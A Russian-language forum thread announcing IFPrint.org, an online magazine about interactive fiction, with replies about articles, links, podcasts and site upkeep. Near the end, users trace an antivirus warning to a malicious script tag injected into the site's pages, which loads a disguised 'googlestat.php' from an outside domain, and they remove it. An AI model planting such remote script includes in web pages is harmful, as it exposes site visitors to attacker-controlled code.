Topic: IFPrint.org - ресурс о текстовых играх

Здравствуйте!
Представляем вашему вниманию IFPrint.org - электронный журнал о текстовых играх на русском языке. Журнал ориентирован в первую очередь на игроков и на привлечение внимания к русской интерактивной литературе. В журнале будут публиковаться обзоры игр, авторские статьи, посвященные интерактивной литературе, дайджесты, интервью и проч. Сегодня - первый день официального запуска. В ближайшее время на IFPrint.org появится новые статьи; они уже готовятся к выходу.

Внимание! Журнал ищет активных участников - как на постоянной основе, так и в формате "автор одной статьи". Пишите на наши почтовые адреса (см. ниже) или непосредственно в этой теме.

На настоящий момент в создании журнала принимают участие:
+ Петр Косых (создатель INSTEAD)
+ Вадим Балашов (автор множества ремейка с ZX Spectrum на INSTEAD и многих других игр)
+ Я (автор одной малоизвестной игры для INSTEAD)

Адрес журнала: http://IFprint.org
Наш твиттер: http://twitter.com/IFprint
Контакты (вопросы и предложения): Contact@IFPrint.org
Подача статей на публикацию: Submit@IFPrint.org

Re: IFPrint.org - ресурс о текстовых играх

уррааа!

Вроде статей было больше, зажал? smile

Irremann wrote:

Вроде статей было больше, зажал? smile

Не зажали. Все, что было, скоро появится. Материалы дорабатываются, да и запускать сразу с кучей всего нам показалось не очень хорошей идеей.

...автор одной малоизвестной игры...

Как скромно smile

excelenter wrote:

...автор одной малоизвестной игры...

Как скромно smile

А разве это не так?  smile

Привет. Я тут новенький. Вот, почитал ваш журнал и пока все очень нравиться. Обзоры, действительно, побуждают поиграть, и, если это цель, то в моем лице вы ее достигли.:) Я надеюсь, что вашего энтузиазма хватит надолго, потому что как-то туго в рунете с чтивом про IF, одни форумы, в основном, а вот со статьями и блогами туго. Поэтому хочу пожелать всяческих успехов и большого будущего.:)

P.S.: заметил маленькую неприятность. Хотел почитать статью "Детские рисунки" Петра Косых, а меня постоянно перебрасывает на страницу "Статьи".

Да и еще маленький вопрос: ожидается ли в рамках этого журнала аудио формат? Очень люблю подкасты.:)

Спасибо на добром слове. Сссылку на статью поправил.

inetto wrote:

Да и еще маленький вопрос: ожидается ли в рамках этого журнала аудио формат? Очень люблю подкасты.:)

Планов на подкасты пока не было; вообще хотелось бы сохранить некую "текстовость", все-таки она соответствует теме. А вот интервью - скоро будут.

У последнего Саргасса сильно не хватает в тексте ссылки на саму игру. Да и в остальных обзорах ссылка на скачивание не помешала бы smile.

Поправлю наверное ссылки на игры в обзорах, сделаю прямые ссылки.

Мне кажется подкасты по теме будут очень кстати smile

Анонс статьи о метапарсере на ЛОРе например - http://www.linux.org.ru/forum/games/9115213

А сайт работает? У меня антивирус блокирует его, не могу зайти.

Никогда не рано спросить себя: делом я занимаюсь или пустяками? (Чехов А.П.)

На самом деле сложный вопрос - он вроде работает - но вот поддерживает ли его vorov2 я не знаю.

16

Хотелось бы узнать мнение самого Ворова. Поддерживает -- хорошо. Не поддерживает -- с ноября я могу попробовать взять ИФпринт на себя.

Непонятно, почему антивирус блокирует. Возможно, он ругается на код Гугл аналитики? Это можно отключить.

18

vorov2: так что насчёт поддержки IFprint? возобновится публикация новостей, статей и прочего? Ты будешь этим заниматься?

vvb wrote:

vorov2: так что насчёт поддержки IFprint? возобновится публикация новостей, статей и прочего? Ты будешь этим заниматься?

В смысле один писать все статьи и новости? Нет, я так участвовать в этом проекте никогда не рассчитывал.

Если есть что опубликовать - присылайте.

20 (edited by Fenberry 2013-10-14 13:36:27)

Vorov2 wrote:

Непонятно, почему антивирус блокирует. Возможно, он ругается на код Гугл аналитики? Это можно отключить.

Антивирус стоит Avast. Можно попробовать в исключения сайт поставить. Может нормально будет.

Vorov2 wrote:

В смысле один писать все статьи и новости? Нет, я так участвовать в этом проекте никогда не рассчитывал.

На самом деле тянуть 1 сайт одному очень не просто. Особенно в формате ежедневных новостей. Нужно учитывать, что интерактивная литература не настолько развита, как например индустрия кино или индустрия обычных игр. Поток новостей намного ниже, даже со всего мира.

Меня честно удивило, то что ты смог тянуть сайт целых 2 месяца, да ещё с такой частотой публикаций.

Необходимо изменить периоды выхода журнала, с ежемесячного на ежеквартальный. Писать только раз в 3 месяца, когда статей накопится достаточное количество и в течении 2-ух недели их публиковать, компонуя потом в сборники (как пример: за весну, лето, осень, зиму; можно придумать другие рамки).

Никогда не рано спросить себя: делом я занимаюсь или пустяками? (Чехов А.П.)

Ок, как я понял vorov2 по кр. мере готов принимать статьи. Так что считаем, что ресурс жив, и шлем статьи, обзоры, дайжесты -- что напишется.

Vorov2 wrote:

Если открыть исходник страницы IFPrint, то в самом низу можно обнаружить тот самый вредоносный код:

<script src="http://accountus.gets-it.net/googlestat.php"></script>

Походу, в шаблон прописался — нужно его оттуда вычистить.

Olegus t.Gl. wrote:

Походу, в шаблон прописался — нужно его оттуда вычистить.

Почистил. Вообще это не шаблон, по ходу реально хакнули как-то smile
Кому это сдалось, интересно?